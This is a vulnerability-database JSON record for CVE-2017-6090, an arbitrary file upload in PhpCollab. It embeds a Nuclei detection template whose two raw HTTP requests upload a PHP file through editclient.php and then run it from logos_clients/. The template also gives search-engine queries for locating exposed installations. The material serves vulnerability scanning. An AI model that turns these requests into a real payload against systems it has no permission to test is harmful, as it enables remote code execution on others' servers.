{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-6090/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-6090/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-6090/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-6090/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-6090/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-6090"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-6090"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2017/CVE-2017-6090.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2017-6090\n\ninfo:\n  name: PhpColl 2.5.1 Arbitrary File Upload\n  author: pikpikcu\n  severity: high\n  description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.\n  impact: |\n    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.\n  remediation: |\n    Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.\n  reference:\n    - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-6090\n    - https://www.exploit-db.com/exploits/42934/\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2017-6090\n    cwe-id: CWE-434\n    epss-score: 0.96234\n    epss-percentile: 0.99877\n    cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: phpcollab\n    product: phpcollab\n    shodan-query:\n      - http.title:\"PhpCollab\"\n      - http.title:\"phpcollab\"\n    fofa-query: title=\"phpcollab\"\n    google-query: intitle:\"phpcollab\"\n  tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive,vkev,vuln\nvariables:\n  string: \"CVE-2017-6090\"\n\nhttp:\n  - raw:\n      - |\n        POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n        -----------------------------154934846911423734231554128137\n        Content-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\n        Content-Type: application/x-php\n\n        <?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n        -----------------------------154934846911423734231554128137--\n      - |\n        GET /logos_clients/{{randstr}}.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - '{{md5(string)}}'\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b67af5aa2a88ff795e796dc2e596d7e0e0124a303c8d2679ca8e09a590f8c77d022100feebfc69d01a8658bf05351a114f8e0c89e83e877f50a8dfecbdf64fb2409863:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2017-6090"
}